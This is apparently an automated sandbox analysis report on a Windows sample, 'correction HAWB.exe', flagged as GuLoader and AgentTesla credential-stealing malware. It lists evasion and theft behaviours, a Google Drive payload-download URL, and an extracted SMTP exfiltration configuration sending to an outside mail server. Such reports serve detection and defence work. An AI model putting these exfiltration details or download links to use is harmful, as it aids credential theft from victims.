
Windows Analysis Report correction HAWB.exe

Overview

General Information

Sample Name: correction HAWB.exe
Analysis ID: 1656
MD5: 8a29580d47943a0f2c61ca552a63bc30
SHA1: e4cdec934b4bfc2e055216c03ac7056069100b05
SHA256: 53c0cf2d25f350a579729af76c466b68b899586b620ffae8925fcb4d831dc2c8

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • correction HAWB.exe (PID: 7748 cmdline: 'C:\Users\user\Desktop\correction HAWB.exe' MD5: 8A29580D47943A0F2C61CA552A63BC30)
    • RegAsm.exe (PID: 6712 cmdline: 'C:\Users\user\Desktop\correction HAWB.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 396 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 5900 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • UserOOBEBroker.exe (PID: 1772 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}

Yara Overview

Memory Dumps

Source: 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000001.00000002.3821567072.00000000022E0000.00000040.00000001.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Source: Process Memory Space: RegAsm.exe PID: 6712 | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: Process Memory Space: RegAsm.exe PID: 6712 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security

Sigma Overview

Networking:

Sigma detected: RegAsm connects to smtp port
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 116.0.120.83, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 6712, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49771

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: UserOOBEBroker.exe.1772.17.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C89ED10 CryptUnprotectData
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C89F3A1 CryptUnprotectData
Source: correction HAWB.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49769 version: TLS 1.2
Source: Binary string: RegAsm.pdb source: tKZVPq.exe, tKZVPq.exe.7.dr
Source: Binary string: RegAsm.pdb4 source: tKZVPq.exe, 0000000C.00000002.4115929077.0000000000FE2000.00000002.00020000.sdmp, tKZVPq.exe, 0000000F.00000002.4195528975.00000000009A2000.00000002.00020000.sdmp, tKZVPq.exe.7.dr

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49771 -> 116.0.120.83:587
Source: Joe Sandbox View | ASN Name: GTC-MY-PIP-ASGlobalTransitCommunications-MalaysiaMY
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 116.0.120.83
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oO HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko; Host: drive.google.com; Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/t4shmnlujbaqahk4bi15tv00ii385av2/1634178900000/16524389560697724177/*/1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oO?e=download HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko; Cache-Control: no-cache; Host: doc-08-28-docs.googleusercontent.com; Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.11.20:49771 -> 116.0.120.83:587
Source: global traffic | TCP traffic: 192.168.11.20:49771 -> 116.0.120.83:587
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: RegAsm.exe, 00000007.00000002.8380892520.000000001DAF6000.00000004.00000001.sdmp | String found in binary or memory: [long JSON blob omitted]
Source: RegAsm.exe, 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000007.00000002.8380892520.000000001DAF6000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.8381893375.000000001DB81000.00000004.00000001.sdmp | String found in binary or memory: http://AVyHehd5cM53ZVmf.org
Source: RegAsm.exe, 00000007.00000002.8380892520.000000001DAF6000.00000004.00000001.sdmp | String found in binary or memory: http://AVyHehd5cM53ZVmf.org(6
Source: RegAsm.exe, 00000007.00000002.8380892520.000000001DAF6000.00000004.00000001.sdmp | String found in binary or memory: http://AVyHehd5cM53ZVmf.orgt-
Source: RegAsm.exe, 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmp | String found in binary or memory: http://JgQKqy.com
Source: RegAsm.exe, 00000007.00000003.3793085932.0000000000DC6000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000007.00000003.3793085932.0000000000DC6000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000007.00000002.8381687035.000000001DB71000.00000004.00000001.sdmp | String found in binary or memory: http://cselegance.com
Source: RegAsm.exe, 00000007.00000002.8381687035.000000001DB71000.00000004.00000001.sdmp | String found in binary or memory: http://mail.cselegance.com
Source: UserOOBEBroker.exe, 00000011.00000002.8367603018.0000027B2F3F0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.microso
Source: RegAsm.exe, 00000007.00000003.3793085932.0000000000DC6000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmp | String found in binary or memory: https://doc-08-28-docs.googleusercontent.com/
Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmp | String found in binary or memory: https://doc-08-28-docs.googleusercontent.com/I
Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmp | String found in binary or memory: https://doc-08-28-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/t4shmnlu
Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmp | String found in binary or memory: https://doc-08-28-docs.googleusercontent.com/eU
Source: RegAsm.exe, 00000007.00000002.8369321022.0000000000D38000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/2wHG
Source: RegAsm.exe, 00000007.00000002.8369321022.0000000000D38000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/Bw
Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.8368434172.0000000000C00000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oO
Source: RegAsm.exe, 00000007.00000002.8369321022.0000000000D38000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oOUs
Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oOVsEG
Source: RegAsm.exe, 00000007.00000002.8381984126.000000001DB87000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.8380502286.000000001DAB2000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 00000007.00000002.8381984126.000000001DB87000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 00000007.00000002.8381984126.000000001DB87000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 00000007.00000002.8381984126.000000001DB87000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 00000007.00000002.8380502286.000000001DAB2000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: drive.google.com

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: correction HAWB.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_004022BB
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_00403444
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_0040322C
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_004034DC
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_004032B6
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_0040333F
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_004033CA
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_004031AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_008A1130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_008A3A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_008AC278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_008A4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_008ACFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_008A3708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00C9C5D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00C9E29F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00C94EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00C9FC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00C99DB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00C91D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C89B9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C897106
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C893D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C896E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C89C428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C89C328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1D895E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1D894ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1D895DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1D896AF1
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Code function: 12_2_00FE3DFE
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Code function: 15_2_009A3DFE
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: String function: 0040177E appears 94 times
Source: correction HAWB.exe, 00000001.00000000.3317832386.000000000041C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameUnelega5.exe vs correction HAWB.exe
Source: correction HAWB.exe, 00000001.00000002.3822812201.0000000002B70000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUnelega5.exeFE2X vs correction HAWB.exe
Source: correction HAWB.exe | Binary or memory string: OriginalFilenameUnelega5.exe vs correction HAWB.exe
Source: correction HAWB.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\correction HAWB.exe | Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Section loaded: edgegdi.dll
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Section loaded: edgegdi.dll
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
Source: correction HAWB.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\correction HAWB.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\correction HAWB.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown | Process created: C:\Users\user\Desktop\correction HAWB.exe 'C:\Users\user\Desktop\correction HAWB.exe'
Source: C:\Users\user\Desktop\correction HAWB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\correction HAWB.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: C:\Users\user\Desktop\correction HAWB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\correction HAWB.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Roaming\tKZVPq
Source: classification engine | Classification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@9/6@4/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_03
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000001.00000002.3821567072.00000000022E0000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_00403C72 push eax; iretd 1_2_00403C73
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_0040440B pushad ; iretd 1_2_00404415
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_00405ADE push esi; ret 1_2_00405AEC
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_00406AE7 push ss; iretd 1_2_00406AE8
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_0040695C push eax; ret 1_2_00406974
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_00406F76 push 0000002Ch; iretd 1_2_00406F78
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_004057DC push ecx; ret 1_2_004057E0
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_00407BBE push eax; retf 1_2_00407BBF
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_022E4A7F push eax; ret 1_2_022E4A85
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_022E08A6 push es; iretd 1_2_022E08A7
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_022E0B36 push B85A74BAh; iretd 1_2_022E0B3C
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_022E250C push eax; ret 1_2_022E250D
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_022E175C push eax; ret 1_2_022E175D
Source: C:\Users\user\Desktop\correction HAWB.exe | Code function: 1_2_022E2F59 push edx; ret 1_2_022E2F5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ss; mov dword ptr [esp], ebx 7_2_1C8921A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C8924E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C892532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C89253E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C89257E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C89258A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C8925CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C8925D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C892616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx 7_2_1C892622
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Code function: 12_2_00FE4469 push cs; retf 12_2_00FE449E
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Code function: 12_2_00FE44A3 push es; retf 12_2_00FE44A4
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Code function: 12_2_00FE4289 push es; retf 12_2_00FE4294
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Code function: 15_2_009A4289 push es; retf 15_2_009A4294
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Code function: 15_2_009A4469 push cs; retf 15_2_009A449E
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe | Code function: 15_2_009A44A3 push es; retf 15_2_009A44A4
Source: initial sample | Static PE information: section name: .text entropy: 6.82320580255
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe